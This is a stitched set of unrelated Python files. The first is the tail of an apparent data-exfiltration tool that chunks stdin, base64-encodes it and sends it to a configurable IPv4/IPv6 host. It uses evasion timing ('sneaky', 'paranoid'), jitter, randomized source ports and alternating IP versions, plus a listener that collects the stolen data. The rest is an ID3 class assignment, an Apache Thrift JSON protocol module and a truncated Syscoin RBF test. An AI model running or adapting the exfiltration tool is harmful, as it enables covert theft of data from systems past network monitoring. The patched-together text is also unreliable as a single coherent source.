len(base64.b64decode(data)), base64.b64decode(data))
)
sock.send(data) # Send TCP stream
data_sent += len(data)
if args.verbose >= 3:
print(
"[D] Buffer {0} bytes sent:\n{1}".format(
len(data), data)
)
sock.close()
return(True) # Send success
def ip_version(sel_type):
"""
IP version selection algorithms
"""
random.seed(a=urandom(100)) # Initialize seed urandom
ipv4_only = False
ipv6_only = False
if sel_type == 0: # Random odd selection
r = random.randint(1, 100)
if r % 2 == 0:
version = 6
else:
version = 4
elif sel_type == 1: # Random selection
version = random.sample([4, 6], 1)[0]
elif sel_type == 2:
version = random.choice([4, 6])
elif sel_type == 3:
if random.random() >= 0.5:
version = 6
else:
version = 4
elif sel_type == 4: # IPv4 only
version = 4
ipv4_only = True
elif sel_type == 6: # IPv6 only
version = 6
ipv6_only = True
global ip6_sessions_total # Session tracking
global ip4_sessions_total
global ip6_sessions
global ip4_sessions
if version == 6:
ip6_sessions += 1
ip6_sessions_total += 1
if version == 4:
ip4_sessions += 1
ip4_sessions_total += 1
if ip6_sessions > args.max_subsequent_sessions and not ipv6_only:
version = 4
ip6_sessions = 0
ip4_sessions = 1
ip6_sessions_total -= 1
ip4_sessions_total += 1
if args.verbose >= 2:
            print(
                "[+] Maximum number of subsequent {0}"
                " IPv6 sessions reached".format(
                    args.max_subsequent_sessions)
            )
if ip4_sessions > args.max_subsequent_sessions and not ipv4_only:
version = 6
ip4_sessions = 0
ip6_sessions = 1
ip4_sessions_total -= 1
ip6_sessions_total += 1
if args.verbose >= 2:
            print(
                "[+] Maximum number of subsequent {0}"
                " IPv4 sessions reached".format(
                    args.max_subsequent_sessions)
            )
return(version)
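# Illustrative behaviour (with the default --max_subsequent_sessions=3):
# ip_version(4) always picks IPv4, ip_version(6) always picks IPv6, and the
# random modes 0-3 flip between the two, never allowing more than three
# subsequent sessions of the same IP version.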
def wait():
"""
Session timing (seconds)
"""
if args.timing_set == -1:
if args.timing == 0:
sleep_time = 0.15 # Insane
if args.verbose >= 2:
print("[+] Insane send at {0}s".format(sleep_time))
elif args.timing == 1:
            sleep_time = 3  # Aggressive
            if args.verbose >= 2:
                print("[+] Aggressive send at {0}s".format(sleep_time))
elif args.timing == 2:
sleep_time = 15 # Polite
if args.verbose >= 2:
print("[+] Polite send at {0}s".format(sleep_time))
elif args.timing == 3:
sleep_time = 30 # Sneaky
if args.verbose >= 2:
print("[+] Sneaky send at {0}s".format(sleep_time))
elif args.timing >= 4:
sleep_time = 300 # Paranoid
if args.verbose >= 2:
print("[+] Paranoid send at {0}s".format(sleep_time))
if args.timing_set >= 0: # Custom timing
sleep_time = args.timing_set
if args.verbose >= 2:
print(
"[+] Custom interval timing of {0}s".format(
sleep_time)
)
if args.timing_randomize:
sleep_time = sleep_time + random.uniform(-0.4, 0.4) * sleep_time
if args.verbose >= 2:
print(
"[+] Session interval randomized to {0}s".format(
sleep_time)
)
sleep(sleep_time)
return(True)
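# Illustrative mapping of the -T timing levels to delays, in seconds:
#   0 -> 0.15 (insane), 1 -> 3 (aggressive), 2 -> 15 (polite),
#   3 -> 30 (sneaky), 4+ -> 300 (paranoid).
# --timing_set N overrides these values and --timing_randomize jitters the
# chosen delay by up to +/-40 percent.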
# Command line option parser
parser = argparse.ArgumentParser(
description="Exfiltrate data over dual-stack IPv4 and IPv6 sessions",
)
parser.add_argument(
'-t', '--tcp',
action="store_true",
help="Use TCP")
parser.add_argument(
'-u', '--udp',
action="store_true",
help="Use UDP. Default: udp")
parser.add_argument(
'-l', '--listen',
action="store_true",
help="Listen (server) mode. Default: send (client)")
parser.add_argument(
'-b64', '--base64',
action="store_true",
help="Base64 encode/decode the payload")
parser.add_argument(
'-b', '--buffer',
type=int,
default=500,
help="Buffer size. Default: 500")
parser.add_argument(
'-h4', '--host4',
type=str,
default="127.0.0.1",
help="Host IPv4 address. Default: 127.0.0.1")
parser.add_argument(
'-h6', '--host6',
type=str,
default="::1",
help="Host IPv6 address. Default: ::1")
parser.add_argument(
'-p', '--port',
type=int,
default=443,
help="Destination or listen port. Default: 443")
parser.add_argument(
'-i', '--interface',
type=str,
default="eth0",
help="Network interface. Default: eth0")
parser.add_argument(
'-v', '--verbose',
action="count",
default=0,
help="Increase verbosity")
parser.add_argument(
'--show_stat',
action="store_true",
help="Show exfiltration statistics. On if verbosity used")
parser.add_argument(
'-T', '--timing',
type=int,
default=1,
help="Session delay timing level 0-4. Default: 1")
parser.add_argument( # TODO: Implement TCP
'-sp', '--source_port', # source port
type=int,
help="Specify source port. UDP only")
parser.add_argument(
'--randomize_source_port',
action="store_true",
help="Randomize source port. Default:1024-65535")
parser.add_argument(
'-sip4', '--source_ip4',
type=str,
help="Specify source IPv4. UDP only")
parser.add_argument(
'-sip6', '--source_ip6',
type=str,
help="Specify source IPv6. UDP only")
parser.add_argument(
'-k', '--keepalive',
action="store_true",
help="Keep the listener alive. Default: False")
parser.add_argument(
'--timing_randomize',
action="store_true",
help="Randomize session delay timing. Default: False")
parser.add_argument(
'--timing_set',
type=int,
default=-1,
help="Set custom timing. Default: Disabled")
parser.add_argument(
'--ip_version_select',
type=int,
default=0,
help="Choose random IP version selection approach")
parser.add_argument(
'--max_subsequent_sessions',
type=int,
default=3,
    help="Maximum number of subsequent sessions of same IP version."
" Default: 3")
parser.add_argument(
'--hashing',
action="store_true",
    help="Calculate exfiltrated data hash sum. Default: False")
parser.add_argument(
'-V', '--version',
action="store_true",
help="Print program version and exit")
args = parser.parse_args()
if args.version:
print("Version: ", __version__)
sys.exit(0)
# Program variables
buffer_size = args.buffer
host4 = args.host4
host6 = args.host6
port = args.port
ip6_sessions = 0
ip4_sessions = 0
ip6_sessions_total = 0
ip4_sessions_total = 0
data_sent = 0
hash_sum = 0x0
# Main routine
# Client mode
if not args.listen:
if args.verbose >= 1:
print("[*] Client mode")
start_time = time()
buff = 0
read_data = b""
data = b""
while True:
read_data = sys.stdin.buffer.read(1)
if not read_data: # End of input or EOF
send64(data, 0)
break
data += read_data
buff += 1
if buff == buffer_size:
send64(data, 0)
wait()
buff = 0
data = b""
send64(b"", 0) # End of transmission
end_time = time() # Can be profiled?
if args.verbose >= 1 or args.show_stat:
print(
"[*] SUMMARY: IPv4 sessions: {0}, IPv6 sessions: {1}, "
"Total sessions: {2}, Data: {3}B, Time: {4: .2f}s".format(
ip4_sessions_total, ip6_sessions_total,
ip4_sessions_total + ip6_sessions_total,
data_sent,
end_time - start_time)
)
if args.hashing:
print(
"[+] Exfiltrated data hash sum: {0}".format(
hex(hash_sum))
)
# Listen mode
if args.listen:
signal.signal(signal.SIGINT, signal_handler) # Terminate on Crl+C
if args.verbose >= 1:
print("[*] Listen mode")
if args.base64:
buffer_size = ceil(buffer_size * 1.5) # Increase receive buffer size
if not args.udp and not args.tcp:
if args.verbose >= 2:
print("[+] Defaulting to UDP protocol")
args.udp = True
if args.udp:
sock64 = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_DGRAM) # UDP
socket.SO_BINDTODEVICE = 25 # If not specified by system
sock64.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
sock64.bind(('::', port)) # Listen on both protocols
if args.verbose >= 1:
print(
"[*] Listening on {0} IPv4:'{1}'"
" IPv6:'{2}' port:{3} protocol:UDP".format(
args.interface, host4, host6, port)
)
while True:
data64, addr64 = sock64.recvfrom(buffer_size)
if data64:
if args.verbose >= 2:
print("\n[+] Received from {0}".format(addr64))
if args.base64:
if args.verbose >= 3:
print(
"\n[D] Base64 encoded data {0} bytes:\n{1}".format(
len(data64), data64)
)
data64 = base64.b64decode(data64)
if args.hashing:
hashsum(data64)
if args.verbose >= 2:
print(
"\n[+] Data block hash sum: {0}".format(
hex(hash_sum))
)
sys.stdout.buffer.write(data64)
else:
if args.keepalive: # TODO: Fix data output!
continue # data not output to stderr
else:
break
sock64.close()
if args.show_stat or args.verbose >= 1:
if args.hashing:
print(
"\n[+] Exfiltrated data hash sum: {0}".format(
hex(hash_sum))
)
if args.tcp:
sock64 = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_STREAM) # TCP
socket.SO_BINDTODEVICE = 25 # If not specified by system
sock64.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
sock64.bind(('::', port)) # Listen on both protocols
sock64.listen(1)
if args.verbose >= 1:
print(
"[*] Listening on {0} IPv4:'{1}'"
" IPv6:'{2}' port:{3} protocol:TCP".format(
args.interface, host4, host6, port)
)
while True:
conn64, addr64 = sock64.accept()
data64 = conn64.recv(buffer_size)
if data64:
if args.verbose >= 2:
print("\n[+] Received from {0}".format(addr64))
if args.base64:
if args.verbose >= 3:
print(
"\n[D] Base64 encoded data {0} bytes:\n{1}".format(
len(data64), data64)
)
data64 = base64.b64decode(data64)
if args.hashing:
hashsum(data64)
if args.verbose >= 2:
print(
"\n[+] Data block hash sum: {0}".format(
hex(hash_sum))
)
sys.stdout.buffer.write(data64)
else:
if args.keepalive: # TODO: Fix data output!
continue # data not output to stderr
else:
break
sock64.close()
if args.show_stat or args.verbose >= 1:
if args.hashing:
print(
"\n[+] Exfiltrated data hash sum: {0}".format(
hex(hash_sum))
)
|
|
#!/usr/bin/env python3
"""
Filename: id3.py
Author: Christopher Goes
Course: CS 404 Machine Learning and Data Mining
Semester: Spring 2016
Description: The ID3 algorithm
Book: Machine Learning: An Algorithmic Perspective
Github: https://github.com/GhostofGoes/cgoes-cs404
"""
import fileinput
import math
testing = False
input_debugging = False
# From page 251 in the book
def calc_entropy(p):
if p != 0:
return -p * math.log2(p)
else:
return 0
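# Illustrative check (not part of the assignment output): a fair coin carries
# one bit of entropy, calc_entropy(0.5) + calc_entropy(0.5) == 1.0, while a
# certain outcome carries none, calc_entropy(1.0) == 0.0.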
# Based on code from pages 253 - 254 in the book
# Formula: Gain(S, F) = Entropy(S) - sum( len(Sf)/len(S) * Entropy(Sf) )
def calc_info_gain(feature, values, examples, example_answers):
entropy_ans = 0 # Entropy(S)
    entropy2 = 0  # sum( len(Sf) / len(S) * Entropy(Sf) )
# Calculate Entropy for the set of all answers
for ans in list(set(example_answers)):
entropy_ans += calc_entropy(float(example_answers.count(ans)) / len(example_answers))
# for each possible value of a given feature
# sum( prob. of that value appearing * entropy of each subset that has that value )
for val in range(len(values[feature])):
temp = []
ents = 0
for e in range(len(examples)):
if examples[e][feature] == values[feature][val]:
temp.append(example_answers[e])
for exp in list(set(temp)): # Calc entropy of subset by calc. for each possible answer
ents += calc_entropy(float(temp.count(exp)) / len(temp))
entropy2 += (float(len(temp)) / len(examples)) * ents # Add entropy of subset to sum
return entropy_ans - entropy2 # Calculate the information gain
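# Illustrative example with hypothetical data: for answers
# ["yes", "yes", "no", "no"], Entropy(S) = 1.0; a feature whose two values
# split the examples into an all-"yes" subset and an all-"no" subset has
# Entropy(Sf) = 0 for both subsets, so the information gain is 1.0 - 0 = 1.0,
# the best possible split for this set.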
# Calculates the information gain for continuous values
def calc_continuous_info_gain(feature, features, data, data_answers):
entropy_ans = 0 # Entropy(S)
values = []
gains = []
# Calculate entropy for all the answers (same as in the normal info gain function)
for ans in list(set(data_answers)):
entropy_ans += calc_entropy(float(data_answers.count(ans)) / len(data_answers))
# Get all the continuous values
for i in range(len(data)):
values.append(float(data[i][feature]))
for val in values:
ents_less = 0
ents_more = 0
temp_less = []
temp_more = []
index = 0
for i in values:
if i <= val:
temp_less.append(i)
temp_less.append(data_answers[index])
elif i > val:
temp_more.append(i)
temp_more.append(data_answers[index])
index += 1
for l in list(set(temp_less)):
ents_less += calc_entropy(float(temp_less.count(l)) / len(temp_less))
gains.append((float(len(temp_less)) / len(data)) * ents_less)
for m in list(set(temp_more)):
ents_more += calc_entropy(float(temp_more.count(m)) / len(temp_more))
gains[-1] += (float(len(temp_more)) / len(data)) * ents_more
if testing:
print("values[stuff]:", values[gains.index(max(gains)) - 1])
return max(gains), values[gains.index(max(gains)) - 1] # Gain, Value we selected
# Based on algorithm on pages 255-256 in the book
def make_tree(data, data_answers, features, labels):
if not data: # No more data
return None
elif not features: # No more features, empty branch
return max(set(data_answers), key=data_answers.count) # http://stackoverflow.com/a/1518632/2214380
elif len(set(data_answers)) == 1: # One class remaining
return set(data_answers).pop()
else:
gains = []
cont_val = 0.0
# Choose best feature based on information gain
for feature in range(len(features)):
if "continuous" in features[feature]:
temp, cont_val = calc_continuous_info_gain(feature, features, data, data_answers)
if testing:
print("cont_val:", cont_val)
gains.append(temp)
break
else:
gains.append(calc_info_gain(feature, features, data, data_answers))
best_feature = gains.index(max(gains))
if testing:
print("best_feature:", best_feature)
tree = {labels[best_feature]: {}}
# Find possible feature values
for feature in features[best_feature]:
index = 0
new_data = []
less_new_data = []
more_new_data = []
new_answers = []
less_new_answers = []
more_new_answers = []
new_features = []
new_labels = []
if feature == "continuous":
for datapoint in data:
if float(datapoint[best_feature]) <= cont_val:
if best_feature == 0:
datapoint = datapoint[1:]
new_labels = labels[1:]
new_features = features[1:]
elif best_feature == len(features):
datapoint = datapoint[:-1]
new_labels = labels[:-1]
new_features = features[:-1]
else:
new_datapoint = datapoint[:best_feature]
new_datapoint.extend(datapoint[best_feature + 1:])
datapoint = new_datapoint
new_labels = labels[:best_feature]
new_labels.extend(labels[best_feature + 1:])
new_features = features[:best_feature]
new_features.extend(features[best_feature + 1:])
less_new_data.append(datapoint)
less_new_answers.append(data_answers[index])
elif float(datapoint[best_feature]) > cont_val:
if best_feature == 0:
datapoint = datapoint[1:]
new_labels = labels[1:]
new_features = features[1:]
elif best_feature == len(features):
datapoint = datapoint[:-1]
new_labels = labels[:-1]
new_features = features[:-1]
else:
new_datapoint = datapoint[:best_feature]
new_datapoint.extend(datapoint[best_feature + 1:])
datapoint = new_datapoint
new_labels = labels[:best_feature]
new_labels.extend(labels[best_feature + 1:])
new_features = features[:best_feature]
new_features.extend(features[best_feature + 1:])
more_new_data.append(datapoint)
more_new_answers.append(data_answers[index])
index += 1
less_subtree = make_tree(less_new_data, less_new_answers, new_features, new_labels)
more_subtree = make_tree(more_new_data, more_new_answers, new_features, new_labels)
tree[labels[best_feature]]["less " + str(cont_val)] = less_subtree
tree[labels[best_feature]]["more " + str(cont_val)] = more_subtree
# Not continuous
else:
for datapoint in data:
if datapoint[best_feature] == feature:
if best_feature == 0:
datapoint = datapoint[1:]
new_labels = labels[1:]
new_features = features[1:]
elif best_feature == len(features):
datapoint = datapoint[:-1]
new_labels = labels[:-1]
new_features = features[:-1]
                        else: # Error in the book's code: datapoint is being overwritten before reuse. Thanks Keith!
new_datapoint = datapoint[:best_feature]
new_datapoint.extend(datapoint[best_feature+1:])
datapoint = new_datapoint
new_labels = labels[:best_feature]
new_labels.extend(labels[best_feature+1:])
new_features = features[:best_feature]
new_features.extend(features[best_feature+1:])
new_data.append(datapoint)
new_answers.append(data_answers[index])
index += 1
subtree = make_tree(new_data, new_answers, new_features, new_labels)
tree[labels[best_feature]][feature] = subtree
return tree
def print_tree(tree, depth=0):
if tree is None:
pass
elif type(tree) == str or type(tree) == int:
print(" " * depth, tree)
else:
for key in tree:
for val in tree[key]:
if "less" in val:
print(" " * depth, key, "<=", val.split()[-1], ":")
elif "more" in val:
print(" " * depth, key, ">", val.split()[-1], ":")
else:
print(" " * depth, key, "=", val, ":")
print_tree(tree[key][val], depth + 1)
def id3():
labels = []
features = []
answers = []
examples = []
example_answers = []
for line in fileinput.input():
linenum = fileinput.lineno()
if linenum == 1:
num_features = int(line)
elif linenum <= num_features + 1:
temp = line.split()
labels.append(temp[0])
features.append(temp[1:])
elif linenum == num_features + 2:
temp = line.split()
answers = temp[1:]
else:
temp = line.split()
examples.append(temp[:-1])
example_answers.append((temp[-1]))
if input_debugging:
print("Input filename:", fileinput.filename())
print("num_features:", num_features)
for label, feature in zip(labels, features):
print('{:15}'.format(label + ': '), end="", flush=True)
print(feature)
print('\n', answers)
for example, ans in zip(examples, example_answers):
print('{:15}'.format(ans + ': '), end="", flush=True)
print(example)
tree = make_tree(examples, example_answers, features, labels)
print_tree(tree)
# Execute Order 66
id3()
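# Illustrative input layout, reconstructed from the parsing in id3() above
# (the feature names and values are made up). Feed it on stdin or as a file
# argument, courtesy of fileinput:
#     2
#     outlook sunny overcast rain
#     temperature continuous
#     class yes no
#     sunny 85 no
#     overcast 72 yes
#     rain 65 yes
# Line 1 is the feature count, the next lines give each feature's label and
# possible values (or "continuous"), the following line lists the classes,
# and every remaining line is one example ending with its class.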
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from TProtocol import TType, TProtocolBase, TProtocolException
import base64
import json
import math
__all__ = ['TJSONProtocol',
'TJSONProtocolFactory',
'TSimpleJSONProtocol',
'TSimpleJSONProtocolFactory']
VERSION = 1
COMMA = ','
COLON = ':'
LBRACE = '{'
RBRACE = '}'
LBRACKET = '['
RBRACKET = ']'
QUOTE = '"'
BACKSLASH = '\\'
ZERO = '0'
ESCSEQ = '\\u00'
ESCAPE_CHAR = '"\\bfnrt'
ESCAPE_CHAR_VALS = ['"', '\\', '\b', '\f', '\n', '\r', '\t']
NUMERIC_CHAR = '+-.0123456789Ee'
CTYPES = {TType.BOOL: 'tf',
TType.BYTE: 'i8',
TType.I16: 'i16',
TType.I32: 'i32',
TType.I64: 'i64',
TType.DOUBLE: 'dbl',
TType.STRING: 'str',
TType.STRUCT: 'rec',
TType.LIST: 'lst',
TType.SET: 'set',
TType.MAP: 'map'}
JTYPES = {}
for key in CTYPES.keys():
JTYPES[CTYPES[key]] = key
class JSONBaseContext(object):
def __init__(self, protocol):
self.protocol = protocol
self.first = True
def doIO(self, function):
pass
def write(self):
pass
def read(self):
pass
def escapeNum(self):
return False
def __str__(self):
return self.__class__.__name__
class JSONListContext(JSONBaseContext):
def doIO(self, function):
if self.first is True:
self.first = False
else:
function(COMMA)
def write(self):
self.doIO(self.protocol.trans.write)
def read(self):
self.doIO(self.protocol.readJSONSyntaxChar)
class JSONPairContext(JSONBaseContext):
def __init__(self, protocol):
super(JSONPairContext, self).__init__(protocol)
self.colon = True
def doIO(self, function):
if self.first:
self.first = False
self.colon = True
else:
function(COLON if self.colon else COMMA)
self.colon = not self.colon
def write(self):
self.doIO(self.protocol.trans.write)
def read(self):
self.doIO(self.protocol.readJSONSyntaxChar)
def escapeNum(self):
return self.colon
def __str__(self):
return '%s, colon=%s' % (self.__class__.__name__, self.colon)
class LookaheadReader():
hasData = False
data = ''
def __init__(self, protocol):
self.protocol = protocol
def read(self):
if self.hasData is True:
self.hasData = False
else:
self.data = self.protocol.trans.read(1)
return self.data
def peek(self):
if self.hasData is False:
self.data = self.protocol.trans.read(1)
self.hasData = True
return self.data
class TJSONProtocolBase(TProtocolBase):
def __init__(self, trans):
TProtocolBase.__init__(self, trans)
self.resetWriteContext()
self.resetReadContext()
def resetWriteContext(self):
self.context = JSONBaseContext(self)
self.contextStack = [self.context]
def resetReadContext(self):
self.resetWriteContext()
self.reader = LookaheadReader(self)
def pushContext(self, ctx):
self.contextStack.append(ctx)
self.context = ctx
def popContext(self):
self.contextStack.pop()
if self.contextStack:
self.context = self.contextStack[-1]
else:
self.context = JSONBaseContext(self)
def writeJSONString(self, string):
self.context.write()
self.trans.write(json.dumps(string))
def writeJSONNumber(self, number):
self.context.write()
jsNumber = str(number)
if self.context.escapeNum():
jsNumber = "%s%s%s" % (QUOTE, jsNumber, QUOTE)
self.trans.write(jsNumber)
def writeJSONBase64(self, binary):
self.context.write()
self.trans.write(QUOTE)
self.trans.write(base64.b64encode(binary))
self.trans.write(QUOTE)
def writeJSONObjectStart(self):
self.context.write()
self.trans.write(LBRACE)
self.pushContext(JSONPairContext(self))
def writeJSONObjectEnd(self):
self.popContext()
self.trans.write(RBRACE)
def writeJSONArrayStart(self):
self.context.write()
self.trans.write(LBRACKET)
self.pushContext(JSONListContext(self))
def writeJSONArrayEnd(self):
self.popContext()
self.trans.write(RBRACKET)
def readJSONSyntaxChar(self, character):
current = self.reader.read()
if character != current:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Unexpected character: %s" % current)
def readJSONString(self, skipContext):
string = []
if skipContext is False:
self.context.read()
self.readJSONSyntaxChar(QUOTE)
while True:
character = self.reader.read()
if character == QUOTE:
break
if character == ESCSEQ[0]:
character = self.reader.read()
if character == ESCSEQ[1]:
self.readJSONSyntaxChar(ZERO)
self.readJSONSyntaxChar(ZERO)
character = json.JSONDecoder().decode(b'"\u00%s"' % self.trans.read(2))
else:
off = ESCAPE_CHAR.find(character)
if off == -1:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Expected control char")
character = ESCAPE_CHAR_VALS[off]
string.append(character)
return ''.join(string)
def isJSONNumeric(self, character):
    return NUMERIC_CHAR.find(character) != -1
def readJSONQuotes(self):
if (self.context.escapeNum()):
self.readJSONSyntaxChar(QUOTE)
def readJSONNumericChars(self):
numeric = []
while True:
character = self.reader.peek()
if self.isJSONNumeric(character) is False:
break
numeric.append(self.reader.read())
return ''.join(numeric)
def readJSONInteger(self):
self.context.read()
self.readJSONQuotes()
numeric = self.readJSONNumericChars()
self.readJSONQuotes()
try:
return int(numeric)
except ValueError:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Bad data encounted in numeric data")
def readJSONDouble(self):
self.context.read()
if self.reader.peek() == QUOTE:
string = self.readJSONString(True)
try:
double = float(string)
        if (self.context.escapeNum() is False and
not math.isinf(double) and
not math.isnan(double)):
raise TProtocolException(TProtocolException.INVALID_DATA,
"Numeric data unexpectedly quoted")
return double
except ValueError:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Bad data encounted in numeric data")
else:
if self.context.escapeNum() is True:
self.readJSONSyntaxChar(QUOTE)
try:
return float(self.readJSONNumericChars())
except ValueError:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Bad data encounted in numeric data")
def readJSONBase64(self):
string = self.readJSONString(False)
return base64.b64decode(string)
def readJSONObjectStart(self):
self.context.read()
self.readJSONSyntaxChar(LBRACE)
self.pushContext(JSONPairContext(self))
def readJSONObjectEnd(self):
self.readJSONSyntaxChar(RBRACE)
self.popContext()
def readJSONArrayStart(self):
self.context.read()
self.readJSONSyntaxChar(LBRACKET)
self.pushContext(JSONListContext(self))
def readJSONArrayEnd(self):
self.readJSONSyntaxChar(RBRACKET)
self.popContext()
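# For orientation: TJSONProtocol (below) frames each message as a JSON array of
# [VERSION, method name, message type, sequence id, argument struct], with
# struct fields keyed by field id and wrapped in a one-entry object naming the
# field type. A call like add(4, 5) is encoded roughly as:
#     [1,"add",1,0,{"1":{"i32":4},"2":{"i32":5}}]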
class TJSONProtocol(TJSONProtocolBase):
def readMessageBegin(self):
self.resetReadContext()
self.readJSONArrayStart()
if self.readJSONInteger() != VERSION:
raise TProtocolException(TProtocolException.BAD_VERSION,
"Message contained bad version.")
name = self.readJSONString(False)
typen = self.readJSONInteger()
seqid = self.readJSONInteger()
return (name, typen, seqid)
def readMessageEnd(self):
self.readJSONArrayEnd()
def readStructBegin(self):
self.readJSONObjectStart()
def readStructEnd(self):
self.readJSONObjectEnd()
def readFieldBegin(self):
character = self.reader.peek()
ttype = 0
id = 0
if character == RBRACE:
ttype = TType.STOP
else:
id = self.readJSONInteger()
self.readJSONObjectStart()
ttype = JTYPES[self.readJSONString(False)]
return (None, ttype, id)
def readFieldEnd(self):
self.readJSONObjectEnd()
def readMapBegin(self):
self.readJSONArrayStart()
keyType = JTYPES[self.readJSONString(False)]
valueType = JTYPES[self.readJSONString(False)]
size = self.readJSONInteger()
self.readJSONObjectStart()
return (keyType, valueType, size)
def readMapEnd(self):
self.readJSONObjectEnd()
self.readJSONArrayEnd()
def readCollectionBegin(self):
self.readJSONArrayStart()
elemType = JTYPES[self.readJSONString(False)]
size = self.readJSONInteger()
return (elemType, size)
readListBegin = readCollectionBegin
readSetBegin = readCollectionBegin
def readCollectionEnd(self):
self.readJSONArrayEnd()
readSetEnd = readCollectionEnd
readListEnd = readCollectionEnd
def readBool(self):
    return self.readJSONInteger() != 0
def readNumber(self):
return self.readJSONInteger()
readByte = readNumber
readI16 = readNumber
readI32 = readNumber
readI64 = readNumber
def readDouble(self):
return self.readJSONDouble()
def readString(self):
return self.readJSONString(False)
def readBinary(self):
return self.readJSONBase64()
def writeMessageBegin(self, name, request_type, seqid):
self.resetWriteContext()
self.writeJSONArrayStart()
self.writeJSONNumber(VERSION)
self.writeJSONString(name)
self.writeJSONNumber(request_type)
self.writeJSONNumber(seqid)
def writeMessageEnd(self):
self.writeJSONArrayEnd()
def writeStructBegin(self, name):
self.writeJSONObjectStart()
def writeStructEnd(self):
self.writeJSONObjectEnd()
def writeFieldBegin(self, name, ttype, id):
self.writeJSONNumber(id)
self.writeJSONObjectStart()
self.writeJSONString(CTYPES[ttype])
def writeFieldEnd(self):
self.writeJSONObjectEnd()
def writeFieldStop(self):
pass
def writeMapBegin(self, ktype, vtype, size):
self.writeJSONArrayStart()
self.writeJSONString(CTYPES[ktype])
self.writeJSONString(CTYPES[vtype])
self.writeJSONNumber(size)
self.writeJSONObjectStart()
def writeMapEnd(self):
self.writeJSONObjectEnd()
self.writeJSONArrayEnd()
def writeListBegin(self, etype, size):
self.writeJSONArrayStart()
self.writeJSONString(CTYPES[etype])
self.writeJSONNumber(size)
def writeListEnd(self):
self.writeJSONArrayEnd()
def writeSetBegin(self, etype, size):
self.writeJSONArrayStart()
self.writeJSONString(CTYPES[etype])
self.writeJSONNumber(size)
def writeSetEnd(self):
self.writeJSONArrayEnd()
def writeBool(self, boolean):
self.writeJSONNumber(1 if boolean is True else 0)
def writeInteger(self, integer):
self.writeJSONNumber(integer)
writeByte = writeInteger
writeI16 = writeInteger
writeI32 = writeInteger
writeI64 = writeInteger
def writeDouble(self, dbl):
self.writeJSONNumber(dbl)
def writeString(self, string):
self.writeJSONString(string)
def writeBinary(self, binary):
self.writeJSONBase64(binary)
class TJSONProtocolFactory:
def getProtocol(self, trans):
return TJSONProtocol(trans)
class TSimpleJSONProtocol(TJSONProtocolBase):
"""Simple, readable, write-only JSON protocol.
Useful for interacting with scripting languages.
"""
def readMessageBegin(self):
raise NotImplementedError()
def readMessageEnd(self):
raise NotImplementedError()
def readStructBegin(self):
raise NotImplementedError()
def readStructEnd(self):
raise NotImplementedError()
def writeMessageBegin(self, name, request_type, seqid):
self.resetWriteContext()
def writeMessageEnd(self):
pass
def writeStructBegin(self, name):
self.writeJSONObjectStart()
def writeStructEnd(self):
self.writeJSONObjectEnd()
def writeFieldBegin(self, name, ttype, fid):
self.writeJSONString(name)
def writeFieldEnd(self):
pass
def writeMapBegin(self, ktype, vtype, size):
self.writeJSONObjectStart()
def writeMapEnd(self):
self.writeJSONObjectEnd()
def _writeCollectionBegin(self, etype, size):
self.writeJSONArrayStart()
def _writeCollectionEnd(self):
self.writeJSONArrayEnd()
writeListBegin = _writeCollectionBegin
writeListEnd = _writeCollectionEnd
writeSetBegin = _writeCollectionBegin
writeSetEnd = _writeCollectionEnd
def writeInteger(self, integer):
self.writeJSONNumber(integer)
writeByte = writeInteger
writeI16 = writeInteger
writeI32 = writeInteger
writeI64 = writeInteger
def writeBool(self, boolean):
self.writeJSONNumber(1 if boolean is True else 0)
def writeDouble(self, dbl):
self.writeJSONNumber(dbl)
def writeString(self, string):
self.writeJSONString(string)
def writeBinary(self, binary):
self.writeJSONBase64(binary)
class TSimpleJSONProtocolFactory(object):
def getProtocol(self, trans):
return TSimpleJSONProtocol(trans)
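# Minimal usage sketch for TSimpleJSONProtocol (hedged: it assumes the sibling
# TTransport module from the same Thrift copy is importable; in packaged
# Thrift the equivalent import is thrift.transport.TTransport):
#
#     from TTransport import TMemoryBuffer
#
#     trans = TMemoryBuffer()
#     proto = TSimpleJSONProtocol(trans)
#     proto.writeStructBegin('Point')
#     proto.writeFieldBegin('x', TType.I32, 1)
#     proto.writeI32(3)
#     proto.writeFieldBegin('y', TType.I32, 2)
#     proto.writeI32(4)
#     proto.writeStructEnd()
#     print(trans.getvalue())   # {"x":3,"y":4}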
|
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RBF code."""
from decimal import Decimal
from test_framework.messages import COIN, COutPoint, CTransaction, CTxIn, CTxOut
from test_framework.script import CScript, OP_DROP
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, satoshi_round
from test_framework.script_util import DUMMY_P2WPKH_SCRIPT
MAX_REPLACEMENT_LIMIT = 100
def txToHex(tx):
return tx.serialize().hex()
def make_utxo(node, amount, confirmed=True, scriptPubKey=DUMMY_P2WPKH_SCRIPT):
"""Create a txout with a given amount and scriptPubKey
Mines coins as needed.
confirmed - txouts created will be confirmed in the blockchain;
unconfirmed otherwise.
"""
fee = 1*COIN
while node.getbalance() < satoshi_round((amount + fee)/COIN):
node.generate(100)
new_addr = node.getnewaddress()
txid = node.sendtoaddress(new_addr, satoshi_round((amount+fee)/COIN))
tx1 = node.getrawtransaction(txid, 1)
txid = int(txid, 16)
i = None
for i, txout in enumerate(tx1['vout']):
if txout['scriptPubKey']['addresses'] == [new_addr]:
break
assert i is not None
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(txid, i))]
